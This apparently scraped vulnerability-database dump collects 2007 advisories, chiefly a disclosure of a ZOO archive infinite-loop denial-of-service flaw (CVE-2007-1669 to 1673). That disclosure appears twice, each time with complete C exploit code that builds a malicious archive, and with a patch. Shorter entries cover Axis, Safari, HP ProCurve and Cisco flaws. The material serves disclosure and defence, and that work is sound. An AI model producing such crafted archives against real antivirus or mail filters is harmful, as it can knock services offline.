A successful attack can exhaust system resources and trigger a denial-of-service condition.
This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite
loop DoS
Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,
CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid
1980s. The format is based on the LZW compression algorithm and compressed
files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the
files inside the archive. Each file in a ZOO archive is identified by a
direntry structure. Those structures are linked between themselves with a
'next' pointer. This pointer is in fact an offset from the beginning of
the file, representing the next direntry structure. By specifying an
already processed file, it's possible to process more than one time this
same file. The ZOO parser will then enter an infinite loop condition.
III. AFFECTED SOFTWARES
o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system
will have its CPU at 100% utilization and may have problems answering other
requests.
If this attack is conducted against an SMTP content filter running a
vulnerable ZOO implementation, legitimate clients may be unable to send and
receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669:
They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and
2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670:
They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672:
They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671:
They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.
o zoo-2.10 - CVE-2007-1669:
This software is not maintained anymore. A patch for version 2.10 is
provided in section VII of this advisory because some SMTP content
filters may still use this software.
o unzoo.c - CVE-2007-1673:
This software is not maintained anymore. No patch is provided for this
software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at
http://www.guay-leroux.com , it is possible to test your SMTP server
against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger
the infinite loop condition when it is processed.
/*
Exploit for the vulnerability:
Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-S\xe9bastien Guay-Leroux
September 2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Structure of a ZOO header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_NOW 24
#define D_MAJ_VER 28
#define D_MIN_VER 29
#define D_DELETED 30
#define D_FILE_STRUCT 31
#define D_COMMENT_OFFSET 32
#define D_COMMENT_SIZE 36
#define D_FILENAME 38
#define D_VAR_DIR_LEN 51
#define D_TIMEZONE 53
#define D_DIR_CRC 54
#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )
void put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void put_word (char *ptr, unsigned short data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
}
void put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
FILE * open_file (char *filename) {
FILE *fp;
fp = fopen ( filename , "w" );
if (!fp) {
perror ("Cant open file");
exit (1);
}
return fp;
}
void usage (char *progname) {
printf ("\nTo use:\n");
printf ("%s <archive name>\n\n", progname);
exit (1);
}
int main (int argc, char *argv[]) {
FILE *fp;
char *hdr = (char *) malloc (4096);
char *filename = (char *) malloc (256);
int written_bytes;
int total_size;
if ( argc != 2) {
usage ( argv[0] );
}
strncpy (filename, argv[1], 255);
if (!hdr || !filename) {
perror ("Error allocating memory");
exit (1);
}
memset (hdr, 0x00, 4096);
// Build a ZOO header
memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
put_longword (hdr + ZH_NEG_START_OFFSET,
(ZOO_HEADER_SIZE) * -1);
put_byte (hdr + ZH_MAJ_VER, 2);
put_byte (hdr + ZH_MIN_VER, 0);
put_byte (hdr + ZH_ARC_HTYPE, 1);
put_longword (hdr + ZH_ARC_COMMENT, 0);
put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
put_byte (hdr + ZH_VERSION_DATA, 3);
// Build vulnerable direntry struct
put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,
"AAAAAAAA.AAA", 13);
total_size = ZOO_HEADER_SIZE + 51;
fp = open_file (filename);
if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
printf ("The file has been written\n");
} else {
printf ("Cant write to the file\n");
exit (1);
}
fclose (fp);
return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is
always greater than the one you are currently processing. This will
guarantee the fact that it's not possible to process the same files over
and over again. Here is a patch for the software zoo version 2.10
distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c
--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400
+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500
@@ -89,6 +89,7 @@
#endif
struct direntry direntry; /* directory entry */
int first_dir = 1;
/* first dir entry seen? */
+unsigned long zoo_pointer = 0; /* Track our position
in the file */
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n";
static char no_space[] = "Insufficient disk space to extract %s.\n";
@@ -169,6 +170,9 @@
exit_status = 1;
}
zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data
begins */
+
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
}
#ifndef PORTABLE
@@ -597,6 +601,12 @@
} /* end if */
loop_again:
+
+ /* Make sure we are not seeking to already processed data */
+ if (next_ptr <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = next_ptr;
+
zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */
} /* end while */
diff -u zoo/zoolist.c zoo-patched/zoolist.c
--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400
+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500
@@ -92,6 +92,7 @@
int show_mode = 0; /* show file protection */
#endif
int first_dir = 1; /* if first direntry -- to
adjust dat_ofs */
+unsigned long zoo_pointer = 0; /* Track our position in the file
*/
while (*option) {
switch (*option) {
@@ -211,6 +212,9 @@
show_acmt (&zoo_header, zoo_file, 0); /* show
archive comment */
}
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
+
/* Seek to the beginning of the first directory entry */
if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {
ercount++;
@@ -437,6 +441,11 @@
if (verb_list && !fast)
show_comment (&direntry, zoo_file, 0, (char *) NULL);
} /* end if (lots of conditions) */
+
+ /* Make sure we are not seeking to already processed data */
+ if (direntry.next <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = direntry.next;
/* ..seek to next dir entry */
zooseek (zoo_file, direntry.next, 0);
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure
| VAR-200705-0183 | CVE-2007-1669 | Barracuda Spam Firewall Used in etc. zoo decoder Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives.
A successful attack can exhaust system resources and trigger a denial-of-service condition.
This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerability is caused due to an error in the handling of Zoo
archives. This can be exploited to cause an infinite loop resulting
in high CPU utilisation.
SOLUTION:
Update to firmware version 3.4 and virus definition 2.0.6399 or
later.
PROVIDED AND/OR DISCOVERED BY:
Jean-Sebastien Guay-Leroux
ORIGINAL ADVISORY:
Barracuda Networks:
http://www.barracudanetworks.com/ns/resources/tech_alert.php
Jean-Sebastien Guay-Leroux:
http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Topic: Multiple vendors ZOO file decompression infinite
loop DoS
Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,
CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid
1980s. The format is based on the LZW compression algorithm and compressed
files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the
files inside the archive. Each file in a ZOO archive is identified by a
direntry structure. Those structures are linked between themselves with a
'next' pointer. This pointer is in fact an offset from the beginning of
the file, representing the next direntry structure. By specifying an
already processed file, it's possible to process more than one time this
same file. The ZOO parser will then enter an infinite loop condition.
III. AFFECTED SOFTWARES
o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system
will have its CPU at 100% utilization and may have problems answering other
requests.
If this attack is conducted against an SMTP content filter running a
vulnerable ZOO implementation, legitimate clients may be unable to send and
receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669:
They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and
2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670:
They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672:
They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671:
They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.
o zoo-2.10 - CVE-2007-1669:
This software is not maintained anymore. A patch for version 2.10 is
provided in section VII of this advisory because some SMTP content
filters may still use this software.
o unzoo.c - CVE-2007-1673:
This software is not maintained anymore. No patch is provided for this
software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at
http://www.guay-leroux.com , it is possible to test your SMTP server
against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger
the infinite loop condition when it is processed.
/*
Exploit for the vulnerability:
Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-S\xe9bastien Guay-Leroux
September 2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Structure of a ZOO header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_NOW 24
#define D_MAJ_VER 28
#define D_MIN_VER 29
#define D_DELETED 30
#define D_FILE_STRUCT 31
#define D_COMMENT_OFFSET 32
#define D_COMMENT_SIZE 36
#define D_FILENAME 38
#define D_VAR_DIR_LEN 51
#define D_TIMEZONE 53
#define D_DIR_CRC 54
#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )
void put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void put_word (char *ptr, unsigned short data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
}
void put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
FILE * open_file (char *filename) {
FILE *fp;
fp = fopen ( filename , "w" );
if (!fp) {
perror ("Cant open file");
exit (1);
}
return fp;
}
void usage (char *progname) {
printf ("\nTo use:\n");
printf ("%s <archive name>\n\n", progname);
exit (1);
}
int main (int argc, char *argv[]) {
FILE *fp;
char *hdr = (char *) malloc (4096);
char *filename = (char *) malloc (256);
int written_bytes;
int total_size;
if ( argc != 2) {
usage ( argv[0] );
}
strncpy (filename, argv[1], 255);
if (!hdr || !filename) {
perror ("Error allocating memory");
exit (1);
}
memset (hdr, 0x00, 4096);
// Build a ZOO header
memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
put_longword (hdr + ZH_NEG_START_OFFSET,
(ZOO_HEADER_SIZE) * -1);
put_byte (hdr + ZH_MAJ_VER, 2);
put_byte (hdr + ZH_MIN_VER, 0);
put_byte (hdr + ZH_ARC_HTYPE, 1);
put_longword (hdr + ZH_ARC_COMMENT, 0);
put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
put_byte (hdr + ZH_VERSION_DATA, 3);
// Build vulnerable direntry struct
put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,
"AAAAAAAA.AAA", 13);
total_size = ZOO_HEADER_SIZE + 51;
fp = open_file (filename);
if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
printf ("The file has been written\n");
} else {
printf ("Cant write to the file\n");
exit (1);
}
fclose (fp);
return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is
always greater than the one you are currently processing. This will
guarantee the fact that it's not possible to process the same files over
and over again. Here is a patch for the software zoo version 2.10
distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c
--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400
+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500
@@ -89,6 +89,7 @@
#endif
struct direntry direntry; /* directory entry */
int first_dir = 1;
/* first dir entry seen? */
+unsigned long zoo_pointer = 0; /* Track our position
in the file */
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n";
static char no_space[] = "Insufficient disk space to extract %s.\n";
@@ -169,6 +170,9 @@
exit_status = 1;
}
zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data
begins */
+
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
}
#ifndef PORTABLE
@@ -597,6 +601,12 @@
} /* end if */
loop_again:
+
+ /* Make sure we are not seeking to already processed data */
+ if (next_ptr <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = next_ptr;
+
zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */
} /* end while */
diff -u zoo/zoolist.c zoo-patched/zoolist.c
--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400
+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500
@@ -92,6 +92,7 @@
int show_mode = 0; /* show file protection */
#endif
int first_dir = 1; /* if first direntry -- to
adjust dat_ofs */
+unsigned long zoo_pointer = 0; /* Track our position in the file
*/
while (*option) {
switch (*option) {
@@ -211,6 +212,9 @@
show_acmt (&zoo_header, zoo_file, 0); /* show
archive comment */
}
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
+
/* Seek to the beginning of the first directory entry */
if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {
ercount++;
@@ -437,6 +441,11 @@
if (verb_list && !fast)
show_comment (&direntry, zoo_file, 0, (char *) NULL);
} /* end if (lots of conditions) */
+
+ /* Make sure we are not seeking to already processed data */
+ if (direntry.next <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = direntry.next;
/* ..seek to next dir entry */
zooseek (zoo_file, direntry.next, 0);
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure
| VAR-200705-0167 | CVE-2007-2239 | Axis Communications CamImage ActiveX control stack buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the SaveBMP method in the AXIS Camera Control (aka CamImage) ActiveX control before 2.40.0.0 in AxisCamControl.ocx in AXIS 2100, 2110, 2120, 2130 PTZ, 2420, 2420-IR, 2400, 2400+, 2401, 2401+, 2411, and Panorama PTZ allows remote attackers to cause a denial of service (Internet Explorer crash) or execute arbitrary code via a long argument. Axis Camera Control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Axis Camera Control versions prior to 2.40.0.0 are vulnerable to this issue.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerability is caused due to a boundary error when handling the
"SaveBMP()" method and can be exploited to cause a stack-based buffer
overflow via an overly long argument.
Successful exploitation allows execution of arbitrary code.
SOLUTION:
Update to version 2.40.0.0 or later.
http://www.axis.com/techsup/software/acc/files/AXISCameraControl.zip
PROVIDED AND/OR DISCOVERED BY:
Will Dormann, CERT/CC.
ORIGINAL ADVISORY:
Axis Communications:
http://www.axis.com/techsup/software/acc/files/acc_security_update_1_00.pdf
US-CERT VU#355809:
http://www.kb.cert.org/vuls/id/355809
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0278 | CVE-2007-2580 | Apple Safari Vulnerability in which important information is obtained |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
Unspecified vulnerability in Apple Safari allows local users to obtain sensitive information (saved keychain passwords) via the document.loginform.password.value JavaScript parameter loaded from an AppleScript script. Apple Safari is prone to an unspecified local vulnerability.
Few technical details are currently available. We will update this BID as more information emerges
| VAR-200705-0549 | CVE-2007-2502 | HP ProCurve 9300m Service operation disruption in series switches (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in HP ProCurve 9300m Series switches with software 08.0.01c through 08.0.01j allows remote attackers to cause a denial of service via unknown vectors, a different switch series than CVE-2006-4015. This vulnerability CVE-2006-4015 It is a vulnerability of a different switch series.Service disruption by a third party (DoS) There is a possibility of being put into a state. This issue most likely occurs because the device fails to properly sanitize user-supplied input.
An attacker can exploit this issue to crash an affected device, effectively denying service to legitimate users.
This issue affects HP ProCurve 9300m Switches running software versions 08.0.01c to 08.0.01j.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerability is caused due to an unspecified error, which can be
exploited to cause a DoS. No more information is currently available.
The vulnerability is reported in versions 8.0.01c \x96 08.0.01j.
SOLUTION:
Install software version 07.8.03.
http://www.hp.com/rnd/software/switches.htm
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01034753
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0565 | CVE-2007-2461 | Cisco PIX/ASA DHCP Relay Remote Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The DHCP relay agent in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 allows remote attackers to cause a denial of service (dropped packets) via a DHCPREQUEST or DHCPINFORM message that causes multiple DHCPACK messages to be sent from DHCP servers to the agent, which consumes the memory allocated for a local buffer. NOTE: this issue only occurs when multiple DHCP servers are used. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. Cisco PIX and ASA are prone to a remote denial-of-service vulnerability because the software fails to properly handle DHCP packets in certain circumstances.
Successfully exploiting this issue allows attackers with access to a LAN served by a vulnerable device to consume excessive memory resources. This will eventually cause the device to stop forwarding further packets, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCsh50277. PIX is a firewall device that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. If a DHCPACK message is received from multiple DHCP servers in response to a DHCPREQUEST or DHCPINFORM message from a DHCP client, it may result in a block memory consumption of 1550 bytes. Once the 1550-byte block memory is completely consumed, the device will start to drop packets, making it impossible to forward packets.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Cisco PIX and ASA Denial of Service and Security Bypass
SECUNIA ADVISORY ID:
SA25109
VERIFY ADVISORY:
http://secunia.com/advisories/25109/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS
WHERE:
>From remote
OPERATING SYSTEM:
Cisco Adaptive Security Appliance (ASA) 7.x
http://secunia.com/product/6115/
Cisco PIX 7.x
http://secunia.com/product/6102/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco PIX and ASA, which
can be exploited by malicious people to bypass certain security
restrictions or cause a DoS (Denial of Service).
1) An unspecified error exists when using the LDAP authentication
mechanism, which can be exploited to bypass the authentication and
gain access to the device or the network.
Successful exploitation requires that the device uses the Layer 2
Tunneling Protocol (L2TP) and is configured to use LDAP servers with
another protocol other than PAP for authentication, or that the
device offers remote management access (telnet, SSH, HTTP) and uses
an LDAP AAA server for authentication.
2) An unspecified error when using VPN connections configured with
password expiry can be exploited to cause a DoS.
Successful exploitation requires that the tunnel group is configured
with password expiry. In order to exploit this in IPSec VPN
connections, an attacker also needs to know the group name and group
password.
3) A race condition within the processing of non-standard SSL
sessions in the SSL VPN server of Cisco ASA appliances can be
exploited to cause the device to reload.
Successful exploitation requires that clientless SSL is used.
Successful exploitation requires that devices are configured to use
the DHCP relay agent.
SOLUTION:
Apply updated software versions. Please see vendor advisories for
details.
PROVIDED AND/OR DISCOVERED BY:
1-3) Reported by the vendor.
4) Lisa Sittler and Grant Deffenbaugh, CERT/CC.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml
http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html
